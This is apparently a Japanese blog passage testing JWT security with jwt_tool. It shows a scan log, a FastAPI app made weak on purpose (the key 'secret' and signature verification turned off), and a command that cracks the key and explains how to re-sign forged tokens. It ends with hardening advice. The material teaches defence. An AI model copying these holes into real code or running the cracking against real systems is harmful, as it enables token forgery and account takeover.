jwttool_af04dd0781c9a79917557168e245314e Injected jwt_tool into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_5ebac1d51563a090bd69e665ec32b1ea Injected jwt_tool into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_5550064990753a04dcdcdefbeedd3e5d Injected jwt_tool into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_c0f233babacfbba564ec6674d79aff10 Injected jwt_tool into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_7f065b636b6a8810de35d5767cf79c1b Injected jwt_tool into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_bd1b10c9b2535f5e231be8fc5abd0911 Injected jwt_tool into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_f85cd5f4899ab6819a8f70f9e9066344 Injected jwt_tool into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_64e33e3a3808ebe784f02a0afbc73438 Injected jwt_tool into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_493b408aaf41fbfba2c5c606af49d551 Injected jwt_tool into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_41394509e00460540945a4c151eaf709 Injected jwt_tool into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_ed6b94a4eeeade77b4ed3073c1db5eaf Injected jwt_tool into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_5d91db11e417ced9d05986229bae92eb Injected jwt_tool into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_1730b38b585c599b2074800da8ec9322 Injected jwt_tool into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_74d4269eafec80defc3e436a7ee590ea Injected jwt_tool into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_708855091612c873414529d435aae1cd Injected jwt_tool into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_c3b317d5c129fcac52e03a02d324e1b3 Injected jwt_tool into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_ffa19dde9c233203a3d0909f26396cf8 Injected jwt_tool into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_b023025f50c41547e932a40c206e009e Injected jwt_tool into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_d95d0d9b26d5471c28663d420eeb3b33 Injected jwt_tool into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_5a127a1c98b41ad40cf47bd67fee6541 Injected jwt_tool into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_84aa45f4121bbcb9f1dae62ddf676acb Injected jwt_tool into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_ee519c0c0aee9ec0198fca52062c4613 Injected jwt_tool into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_9620c7d10d466e0516f0012eae1a06ef Injected jwt_tool into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_eff1794701639e28d7222f9f59c29b45 Injected jwt_tool into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_3eac72c156d616580b725613c4b4fd36 Injected jwt_tool into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_52186265aef878bf4de1517d5030bdc1 Injected jwt_tool into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_05df06246b75617f3de19d967a772ea7 Injected jwt_tool into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_7a79b832f9ad352ba2bc8764b4abd0ab Injected jwt_tool into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_b441a9036b69cc0b01c7da0af40b32b6 Injected jwt_tool into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_f710bf5677bdfc42a2d7facec25fb79e Injected jwt_tool into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_2594ec29987985dda1e7606f58ab7e75 Injected jwt_tool into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_b9f5106d10b6e34950e0a16ef75706b3 Injected jwt_tool into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_142ce1784ecd95f7b897177b7822c8c5 Injected jwt_tool into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_942a32ade5ea74204bf06651a009ebb5 Injected jwt_tool into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_c3b3cb59f2f8840d6661a76f711c5037 Injected jwt_tool into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_e0364b3782eca84f88d361e7638fa6c0 Injected jwt_tool into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_db48bdbb9ed6a09f051da3e3f7c813a6 Injected jwt_tool into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_8511ff4736ef818e95eb39a1efe4b57d Injected jwt_tool into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_4c76379fbf074e05f8583a7c35a44735 Injected jwt_tool into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_19c8fe77a3c4e1b770e638665ab4d149 Injected jwt_tool into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_bbe57a9da867ce92bd5aa2785f22d977 Injected 0 into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_bc50a870b14cc817e577361f8882b755 Injected 0 into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_1d3548ad1641e9f21b04bc80d254aa28 Injected 0 into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_726ff84ebc5768e034177ab17a9ce908 Injected 0 into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_74c456dc2ed2a46c299361ecaec17828 Injected 0 into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_378f7e0f721b1e7e52984f4d7d6ee2d9 Injected 0 into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_cd77e0ef14dc739d620f61f598d9712b Injected 0 into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_198c63dcddb15863e364408cd72a435a Injected 0 into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_a760e69f3e0ee28af1b12f6a17f13560 Injected 0 into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_10e4b936e431534aad40b3eb9996df6c Injected 0 into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_57eeb8de95222a2360250f2620291d69 Injected 0 into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_20ac0073e6288d2ffe70d82d882437ec Injected 0 into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_5646bd5902899b181dca2d18d69dbd3a Injected 0 into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_d063e2aeca1f23be12d185cc3714c0c3 Injected 0 into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_62560bc1c47b6240ef1149573bd20484 Injected 0 into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_f91e4bc0162b7e96dd5aaf08ab8bd992 Injected 0 into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_335d8ef0cc92d96604bf23498c88a439 Injected 0 into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_e98d1bfac07f5f9cef0cf0fdd3348252 Injected 0 into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_daa2739b28d14fc4a8424e9651a28a6f Injected 0 into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_125a010a1949c3b26b16f544c99f815e Injected 0 into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_65904495266e7509c10c5f99b0b7a06f Injected 0 into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_dcbad6838d613937435082f897cda892 Injected 0 into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_9a54e6e0bb54147884a265d590b6f056 Injected 0 into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_90f455dde2f9706247fe1b542ed48115 Injected 0 into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_8b61a4f56426b6e2069b2453a1713b4b Injected 0 into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_77693081a736d7cabca5a5c07c524cd9 Injected 0 into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_aa4202112a1f94803b5ee688a2ee8339 Injected 0 into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_0e7a093e7184d711b585df68655cfac1 Injected 0 into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_8ad95c4b97c6321716ac5482c8846591 Injected 0 into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_5ed9a013e193ea2b7c2190b37fda206a Injected 0 into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_d548d92a6d5e237d2ae0c05a0b974c71 Injected 0 into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_d819ebb53f9ae0be35b62a9f19d4fd1d Injected 0 into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_2ff57bc3f0fb31422f79a2cf982f7478 Injected 0 into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_5238e6a6d866d2320b3419270b4a73ff Injected 0 into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_8ce6856252e6f6304715364f9414ccda Injected 0 into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_83d10e50f206a1fea26c3441a05a3ca2 Injected 0 into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_555b470cfc22eab8780e3aa486b581d1 Injected 0 into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_dcdd20e6f4bca3187b34788b9956fe80 Injected 0 into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_85e8b4cc7cbe126c35f34f671a874f83 Injected 0 into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_05222ffc0185710566083f6872d32dc2 Injected 0 into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_71a075d91863e23355439f0c6e979d81 Injected 0 into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_122e420fce938de272b5f324344a3135 Injected 0 into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_516941bb2c143edabbd37d6c1b97327b Injected 0 into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_03b8f0260b8da145a69a46b0ea320776 Injected 0 into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_7a4d9fcc6d8030860b200d36ea8db610 Injected 0 into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_45f0a4edde919a889f5779c291caf0e0 Injected 0 into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_50eee88c26d2b21b319e628a4b6487df Injected 0 into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_ff0ab02106b84d728ee38f672a25a70d Injected 0 into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_8a4a6453f5b918cc8ca5cf5ed0d5a85c Injected 0 into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_28d15db77e70104c49e825cf376f0254 Injected 0 into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_df378470de9cd5551a49d38b915953a9 Injected 0 into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_7d731051b47d9fdde63768f4fab2d7a9 Injected 0 into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_6d7bfe8e53cb8e79d74619ce77c0402e Injected 0 into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_3cae096884cdabbd57e93719432e4e1e Injected 0 into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_f2e789c96bbb71cf9288b6b399908536 Injected 0 into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_e466ca7a1fc49228fe0b8836c95d63b1 Injected 0 into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_c234beeea42fe5846e822fb95514311f Injected 0 into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_7a7585cdb42b8fc2d062c6041f4d2736 Injected 0 into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_4bfd386d0ed2fcc9c8ddef660076050e Injected 0 into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_5cfd6ab8ef163382b0cb6e2cf101e674 Injected 0 into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_2b1a10c2200ca648af4ed6206dab4202 Injected 0 into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_2431962c3c776cd48d6b071cc28bac97 Injected 0 into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_e83c33bcb5ffb0d3bd94818dda8894ac Injected 0 into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_a6d040a0b4f224dd42084b4b1524141d Injected 0 into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_fb32dd51900ef0a20fd527a7d94a0433 Injected 0 into Common Payload Claim: opt Response Code: 403, 43 bytes
Scanning mode completed: review the above results.

脆弱なアプリだとどうなるか

比較のために、あえて弱い JWT を使う FastAPI アプリを起動する。鍵が secret という推測されやすいもので、しかも /very-vulnerable-data は署名検証を無効化している。 

from fastapi import FastAPI, HTTPException, Response, Cookie
from datetime import datetime, timedelta, timezone
import jwt  # PyJWT

app = FastAPI(title="JWT Vulnerability Test with PyJWT")

SECRET_KEY = "secret"  # 弱すぎな鍵
ALGORITHM = "HS256"


@app.post("/login")
def login(response: Response):
    expire = datetime.now(timezone.utc) + timedelta(minutes=30)
    to_encode = {"exp": expire, "sub": "123", "role": "user"}
    encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
    response.set_cookie(key="access_token", value=encoded_jwt)
    return {"message": "Logged in", "token": encoded_jwt}


@app.get("/secure-data")
def secure_data(access_token: str = Cookie(None)):
    if not access_token:
        raise HTTPException(status_code=401, detail="Token missing")
    try:
        payload = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
        return {"message": "Success!", "user_data": payload}
    except jwt.PyJWTError:
        raise HTTPException(status_code=403, detail="Invalid token")


@app.get("/very-vulnerable-data")
def very_vulnerable_data(access_token: str = Cookie(None)):
    if not access_token:
        raise HTTPException(status_code=401, detail="Token missing")
    try:
        payload = jwt.decode(access_token, options={"verify_signature": False})  # 署名を検証しない
        return {"message": "Vulnerable Success", "user_data": payload}
    except jwt.PyJWTError:
        raise HTTPException(status_code=403, detail="Invalid token")

このアプリの /secure-data に対して jwt_tool を実行すると、辞書( jwt-common.txt )との照合で鍵が一瞬で割り出される。 

% python jwt_tool.py -M at -t http://localhost:8000/secure-data -rc "access_token=eyJhbG...(省略)" -np

Testing HS256 token against common JWT secrets (jwt-common.txt)
[+] secret is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "secret"
(以降のスキャン結果は省略)

secret っていう鍵だと、 jwt_tool が同梱している「よくある鍵」リストに入っているのですぐ見つかる。 

% cat jwt-common.txt | grep -x secret
secret

鍵が見つかったら、攻撃者は改ざんした JWT に正しい署名を付け直せる。 verify_signature=False/very-vulnerable-data は、そもそも署名を見ていないので偽造し放題。

Warning

  • HS256 の鍵は推測されない十分長いものにするべき。
  • verify_signature=False で署名の検証を無効化するなんてありえない。
  • 本番では RS256 / EdDSA のような公開鍵方式にするのがより安全。